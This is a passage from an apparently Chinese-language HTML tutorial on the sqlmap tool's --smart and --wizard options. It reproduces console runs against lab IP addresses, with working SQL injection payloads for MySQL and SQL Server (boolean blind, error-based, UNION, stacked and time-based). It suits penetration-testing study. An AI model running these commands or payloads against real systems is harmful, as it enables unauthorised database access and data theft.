style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;smart<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6709\u65f6\u5bf9\u76ee\u6807\u975e\u5e38\u591a\u7684<span>URL<\/span><span>\u8fdb\u884c\u6d4b\u8bd5\uff0c\u4e3a\u8282\u7701\u65f6\u95f4\uff0c\u53ea\u5bf9\u80fd\u591f\u5feb\u901f\u5224\u65ad\u4e3a\u6ce8\u5165\u7684\u62a5\u9519\u70b9\u8fdb\u884c\u6ce8\u5165\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\u3002<\/span><\/span><span 
style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5b50\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.21.128\/sqlmap\/mysql\/get_int.php?ca=17&amp;user=foo&amp;id=1&#8221;&nbsp;&#8211;batch&nbsp;&#8211;smart<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;testing&nbsp;if&nbsp;GET&nbsp;parameter&nbsp;&#8216;ca&#8217;&nbsp;is&nbsp;dynamic<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[WARNING]&nbsp;GET&nbsp;parameter&nbsp;&#8216;ca&#8217;&nbsp;does&nbsp;not&nbsp;appear&nbsp;dynamic<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[WARNING]&nbsp;heuristic&nbsp;(basic)&nbsp;test&nbsp;shows&nbsp;that&nbsp;GET&nbsp;parameter&nbsp;&#8216;ca&#8217;&nbsp;might&nbsp;not&nbsp;be&nbsp;injectable<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;skipping&nbsp;GET&nbsp;parameter&nbsp;&#8216;ca&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;testing&nbsp;if&nbsp;GET&nbsp;parameter&nbsp;&#8216;user&#8217;&nbsp;is&nbsp;dynamic<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[WARNING]&nbsp;GET&nbsp;parameter&nbsp;&#8216;user&#8217;&nbsp;does&nbsp;not&nbsp;appear&nbsp;dynamic<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[WARNING]&nbsp;heuristic&nbsp;(basic)&nbsp;test&nbsp;shows&nbsp;that&nbsp;GET&nbsp;parameter&nbsp;&#8216;user&#8217;&nbsp;might&nbsp;not&nbsp;be&nbsp;injectable<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;skipping&nbsp;GET&nbsp;parameter&nbsp;&#8216;user&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;testing&nbsp;if&nbsp;GET&nbsp;parameter&nbsp;&#8216;id&#8217;&nbsp;is&nbsp;dynamic<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;confirming&nbsp;that&nbsp;GET&nbsp;parameter&nbsp;&#8216;id&#8217;&nbsp;is&nbsp;dynamic<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;GET&nbsp;parameter&nbsp;&#8216;id&#8217;&nbsp;is&nbsp;dynamic<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[WARNING]&nbsp;reflective&nbsp;value(s)&nbsp;found&nbsp;and&nbsp;filtering&nbsp;out<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;heuristic&nbsp;(basic)&nbsp;test&nbsp;shows&nbsp;that&nbsp;GET&nbsp;parameter&nbsp;&#8216;id&#8217;&nbsp;might&nbsp;be&nbsp;injectable&nbsp;(possible&nbsp;DBMS:&nbsp;&#8216;MySQL&#8217;)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;testing&nbsp;for&nbsp;SQL&nbsp;injection&nbsp;on&nbsp;GET&nbsp;parameter&nbsp;&#8216;id&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">heuristic&nbsp;(parsing)&nbsp;test&nbsp;showed&nbsp;that&nbsp;the&nbsp;back-end&nbsp;DBMS&nbsp;could&nbsp;be&nbsp;&#8216;MySQL&#8217;.&nbsp;Do&nbsp;you&nbsp;want&nbsp;to&nbsp;skip&nbsp;test&nbsp;payloads&nbsp;specific&nbsp;for&nbsp;other&nbsp;DBMSes?&nbsp;[Y\/n]&nbsp;Y<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">do&nbsp;you&nbsp;want&nbsp;to&nbsp;include&nbsp;all&nbsp;tests&nbsp;for&nbsp;&#8216;MySQL&#8217;&nbsp;extending&nbsp;provided&nbsp;level&nbsp;(1)&nbsp;and&nbsp;risk&nbsp;(1)?&nbsp;[Y\/n]&nbsp;Y<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;testing&nbsp;&#8216;AND&nbsp;boolean-based&nbsp;blind&nbsp;&#8211;&nbsp;WHERE&nbsp;or&nbsp;HAVING&nbsp;clause&#8217;<\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;GET&nbsp;parameter&nbsp;&#8216;id&#8217;&nbsp;is&nbsp;&#8216;AND&nbsp;boolean-based&nbsp;blind&nbsp;&#8211;&nbsp;WHERE&nbsp;or&nbsp;HAVING&nbsp;clause&#8217;&nbsp;injectable&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;testing&nbsp;&#8216;MySQL&nbsp;&gt;=&nbsp;5.0&nbsp;AND&nbsp;error-based&nbsp;&#8211;&nbsp;WHERE&nbsp;or&nbsp;HAVING&nbsp;clause&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;GET&nbsp;parameter&nbsp;&#8216;id&#8217;&nbsp;is&nbsp;&#8216;MySQL&nbsp;&gt;=&nbsp;5.0&nbsp;AND&nbsp;error-based&nbsp;&#8211;&nbsp;WHERE&nbsp;or&nbsp;HAVING&nbsp;clause&#8217;&nbsp;injectable&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;testing&nbsp;&#8216;MySQL&nbsp;inline&nbsp;queries&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;testing&nbsp;&#8216;MySQL&nbsp;&gt;&nbsp;5.0.11&nbsp;stacked&nbsp;queries&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;testing&nbsp;&#8216;MySQL&nbsp;&lt;&nbsp;5.0.12&nbsp;stacked&nbsp;queries&nbsp;(heavy&nbsp;query)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span 
class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;testing&nbsp;&#8216;MySQL&nbsp;&gt;&nbsp;5.0.11&nbsp;AND&nbsp;time-based&nbsp;blind&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:24]&nbsp;[INFO]&nbsp;GET&nbsp;parameter&nbsp;&#8216;id&#8217;&nbsp;is&nbsp;&#8216;MySQL&nbsp;&gt;&nbsp;5.0.11&nbsp;AND&nbsp;time-based&nbsp;blind&#8217;&nbsp;injectable&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:24]&nbsp;[INFO]&nbsp;testing&nbsp;&#8216;MySQL&nbsp;UNION&nbsp;query&nbsp;(NULL)&nbsp;&#8211;&nbsp;1&nbsp;to&nbsp;20&nbsp;columns&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:24]&nbsp;[INFO]&nbsp;automatically&nbsp;extending&nbsp;ranges&nbsp;for&nbsp;UNION&nbsp;query&nbsp;injection&nbsp;technique&nbsp;tests&nbsp;as&nbsp;there&nbsp;is&nbsp;at&nbsp;least&nbsp;one&nbsp;other&nbsp;potential&nbsp;injection&nbsp;technique&nbsp;found<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:24]&nbsp;[INFO]&nbsp;ORDER&nbsp;BY&nbsp;technique&nbsp;seems&nbsp;to&nbsp;be&nbsp;usable.&nbsp;This&nbsp;should&nbsp;reduce&nbsp;the&nbsp;time&nbsp;needed&nbsp;to&nbsp;find&nbsp;the&nbsp;right&nbsp;number&nbsp;of&nbsp;query&nbsp;columns.&nbsp;Automatically&nbsp;extending&nbsp;the&nbsp;range&nbsp;for&nbsp;current&nbsp;UNION&nbsp;query&nbsp;injection&nbsp;technique&nbsp;test<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">[xx:xx:24]&nbsp;[INFO]&nbsp;target&nbsp;URL&nbsp;appears&nbsp;to&nbsp;have&nbsp;3&nbsp;columns&nbsp;in&nbsp;query<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:24]&nbsp;[INFO]&nbsp;GET&nbsp;parameter&nbsp;&#8216;id&#8217;&nbsp;is&nbsp;&#8216;MySQL&nbsp;UNION&nbsp;query&nbsp;(NULL)&nbsp;&#8211;&nbsp;1&nbsp;to&nbsp;20&nbsp;columns&#8217;&nbsp;injectable<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%88%9D%E7%BA%A7%E7%94%A8%E6%88%B7%E5%90%91%E5%AF%BC%E5%8F%82%E6%95%B0\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u521d\u7ea7\u7528\u6237\u5411\u5bfc\u53c2\u6570<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;wizard&nbsp;<\/span><span>\u9762\u5411\u521d\u7ea7\u7528\u6237\u7684\u53c2\u6570\uff0c\u53ef\u4ee5\u4e00\u6b65\u4e00\u6b65\u6559\u4f60\u5982\u4f55\u8f93\u5165\u9488\u5bf9\u76ee\u6807\u6ce8\u5165\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;&#8211;wizard<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">&nbsp;&nbsp;&nbsp;&nbsp;sqlmap\/1.0-dev-2defc30&nbsp;&#8211;&nbsp;automatic&nbsp;SQL&nbsp;injection&nbsp;and&nbsp;database&nbsp;takeover&nbsp;tool<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">http:\/\/sqlmap.org<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[!]&nbsp;legal&nbsp;disclaimer:&nbsp;Usage&nbsp;of&nbsp;sqlmap&nbsp;for&nbsp;attacking&nbsp;targets&nbsp;without&nbsp;prior&nbsp;mutual&nbsp;consent&nbsp;is&nbsp;illegal.&nbsp;It&nbsp;is&nbsp;the&nbsp;end&nbsp;user&#8217;s&nbsp;responsibility&nbsp;to&nbsp;obey&nbsp;all&nbsp;applicable&nbsp;local,&nbsp;state&nbsp;and&nbsp;federal&nbsp;laws.&nbsp;Developers&nbsp;assume&nbsp;no&nbsp;liability&nbsp;and&nbsp;are&nbsp;not&nbsp;responsible&nbsp;for&nbsp;any&nbsp;misuse&nbsp;or&nbsp;damage&nbsp;caused&nbsp;by&nbsp;this&nbsp;program<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[*]&nbsp;starting&nbsp;at&nbsp;11:25:26<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Please&nbsp;enter&nbsp;full&nbsp;target&nbsp;URL&nbsp;(-u):&nbsp;http:\/\/192.168.21.129\/sqlmap\/mssql\/iis\/get_int.asp?id=1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span 
class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">POST&nbsp;data&nbsp;(--data)&nbsp;[Enter&nbsp;for&nbsp;None]:&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Injection&nbsp;difficulty&nbsp;(--level\/--risk).&nbsp;Please&nbsp;choose:<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[1]&nbsp;Normal&nbsp;(default)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[2]&nbsp;Medium<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[3]&nbsp;Hard<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&gt;&nbsp;1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Enumeration&nbsp;(--banner\/--current-user\/etc).&nbsp;Please&nbsp;choose:<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[1]&nbsp;Basic&nbsp;(default)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[2]&nbsp;Smart<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[3]&nbsp;All<\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&gt;&nbsp;1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">sqlmap&nbsp;is&nbsp;running,&nbsp;please&nbsp;wait..<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">heuristic&nbsp;(parsing)&nbsp;test&nbsp;showed&nbsp;that&nbsp;the&nbsp;back-end&nbsp;DBMS&nbsp;could&nbsp;be&nbsp;&#8216;Microsoft&nbsp;SQL&nbsp;Server&#8217;.&nbsp;Do&nbsp;you&nbsp;want&nbsp;to&nbsp;skip&nbsp;test&nbsp;payloads&nbsp;specific&nbsp;for&nbsp;other&nbsp;DBMSes?&nbsp;[Y\/n]&nbsp;Y<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">do&nbsp;you&nbsp;want&nbsp;to&nbsp;include&nbsp;all&nbsp;tests&nbsp;for&nbsp;&#8216;Microsoft&nbsp;SQL&nbsp;Server&#8217;&nbsp;extending&nbsp;provided&nbsp;level&nbsp;(1)&nbsp;and&nbsp;risk&nbsp;(1)?&nbsp;[Y\/n]&nbsp;Y<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">GET&nbsp;parameter&nbsp;&#8216;id&#8217;&nbsp;is&nbsp;vulnerable.&nbsp;Do&nbsp;you&nbsp;want&nbsp;to&nbsp;keep&nbsp;testing&nbsp;the&nbsp;others&nbsp;(if&nbsp;any)?&nbsp;[y\/N]&nbsp;N<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">sqlmap&nbsp;identified&nbsp;the&nbsp;following&nbsp;injection&nbsp;points&nbsp;with&nbsp;a&nbsp;total&nbsp;of&nbsp;25&nbsp;HTTP(s)&nbsp;requests:<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&#8212;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Place:&nbsp;GET<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Parameter:&nbsp;id<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Type:&nbsp;boolean-based&nbsp;blind<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Title:&nbsp;AND&nbsp;boolean-based&nbsp;blind&nbsp;&#8211;&nbsp;WHERE&nbsp;or&nbsp;HAVING&nbsp;clause<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Payload:&nbsp;id=1&nbsp;AND&nbsp;2986=2986<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Type:&nbsp;error-based<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">&nbsp;&nbsp;&nbsp;&nbsp;Title:&nbsp;Microsoft&nbsp;SQL&nbsp;Server\/Sybase&nbsp;AND&nbsp;error-based&nbsp;&#8211;&nbsp;WHERE&nbsp;or&nbsp;HAVING&nbsp;clause<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Payload:&nbsp;id=1&nbsp;AND&nbsp;4847=CONVERT(INT,(CHAR(58)&nbsp;CHAR(118)&nbsp;CHAR(114)&nbsp;CHAR(100)&nbsp;CHAR(58)&nbsp;(SELECT&nbsp;(CASE&nbsp;WHEN&nbsp;(4847=4847)&nbsp;THEN&nbsp;CHAR(49)&nbsp;ELSE&nbsp;CHAR(48)&nbsp;END))&nbsp;CHAR(58)&nbsp;CHAR(111)&nbsp;CHAR(109)&nbsp;CHAR(113)&nbsp;CHAR(58)))<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Type:&nbsp;UNION&nbsp;query<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Title:&nbsp;Generic&nbsp;UNION&nbsp;query&nbsp;(NULL)&nbsp;&#8211;&nbsp;3&nbsp;columns<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Payload:&nbsp;id=1&nbsp;UNION&nbsp;ALL&nbsp;SELECT&nbsp;NULL,NULL,CHAR(58)&nbsp;CHAR(118)&nbsp;CHAR(114)&nbsp;CHAR(100)&nbsp;CHAR(58)&nbsp;CHAR(70)&nbsp;CHAR(79)&nbsp;CHAR(118)&nbsp;CHAR(106)&nbsp;CHAR(87)&nbsp;CHAR(101)&nbsp;CHAR(119)&nbsp;CHAR(115)&nbsp;CHAR(114)&nbsp;CHAR(77)&nbsp;CHAR(58)&nbsp;CHAR(111)&nbsp;CHAR(109)&nbsp;CHAR(113)&nbsp;CHAR(58)&#8211;&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span 
class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Type:&nbsp;stacked&nbsp;queries<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Title:&nbsp;Microsoft&nbsp;SQL&nbsp;Server\/Sybase&nbsp;stacked&nbsp;queries<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Payload:&nbsp;id=1;&nbsp;WAITFOR&nbsp;DELAY&nbsp;&#8216;0:0:5&#8217;&#8211;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Type:&nbsp;AND\/OR&nbsp;time-based&nbsp;blind<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Title:&nbsp;Microsoft&nbsp;SQL&nbsp;Server\/Sybase&nbsp;time-based&nbsp;blind<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Payload:&nbsp;id=1&nbsp;WAITFOR&nbsp;DELAY&nbsp;&#8216;0:0:5&#8217;&#8211;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Type:&nbsp;inline&nbsp;query<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
